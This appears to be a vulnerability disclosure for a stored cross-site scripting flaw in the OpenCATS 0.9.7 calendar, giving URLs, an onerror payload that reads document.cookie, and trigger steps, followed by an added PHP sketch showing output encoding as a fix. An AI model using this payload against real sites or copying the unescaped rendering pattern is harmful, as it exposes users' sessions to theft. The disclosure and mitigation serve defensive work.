OpenCATS-0.9.7-Stored XSS in Calendar-Add-Event
Date: 2022/12/25
Exploit Author: Sakura501
Vendor Homepage: https://www.opencats.org/
Software Link: https://github.com/opencats/OpenCATS
Version: 0.9.7
Tested on: Windows11/PHP7.3.4/MySQL5.7.26
URL & PoC
http://192.168.2.153/src/opencats/index.php?m=calendar
http://192.168.2.153/src/opencats/index.php?m=calendar&view=DAYVIEW&month=12&year=2022&day=25&showEvent=1
<img src=x onerror=alert(document.cookie);>
Attack Steps
- Click the Calendar menu.
- Click the Add Event button, then the stored XSS will be triggered. You can also click the incoming event to trigger this stored XSS.
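Mitigation sketch for the behaviour described above, added here as an example and not taken from the report or from the OpenCATS code base. It assumes the payload was saved in an event title field (the report does not name the field); the function names, array keys and sample row are hypothetical.

```php
<?php
// Added illustration, not OpenCATS source. All names below are hypothetical.

// Defence in depth: the PoC reads document.cookie, which an HttpOnly
// session cookie does not expose to script.
ini_set('session.cookie_httponly', '1');

// Constructed sample row: what the database would return after the PoC
// payload from this report was saved in an event field (assumed: title).
$event = [
    'title'       => '<img src=x onerror=alert(document.cookie);>',
    'description' => 'Interview with candidate',
];

// Vulnerable pattern: the stored value is concatenated into HTML unchanged,
// so the browser parses it as markup when the calendar view is rendered.
function renderEventUnsafe(array $event): string
{
    return '<div class="event"><b>' . $event['title'] . '</b><p>'
         . $event['description'] . '</p></div>';
}

// Encode at output time for the HTML body / quoted-attribute context.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: every stored field passes through h() before output.
function renderEventSafe(array $event): string
{
    return '<div class="event"><b>' . h($event['title']) . '</b><p>'
         . h($event['description']) . '</p></div>';
}

$unsafe = renderEventUnsafe($event);
$safe   = renderEventSafe($event);

// Compare: does a live <img> tag survive in each rendering?
var_dump(strpos($unsafe, '<img') !== false);
var_dump(strpos($safe, '<img') !== false);
echo $safe, PHP_EOL;
```

Encoding belongs at every place the event is written into a page (day view, upcoming-event list, event detail), since the report shows the same stored value firing from more than one view.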



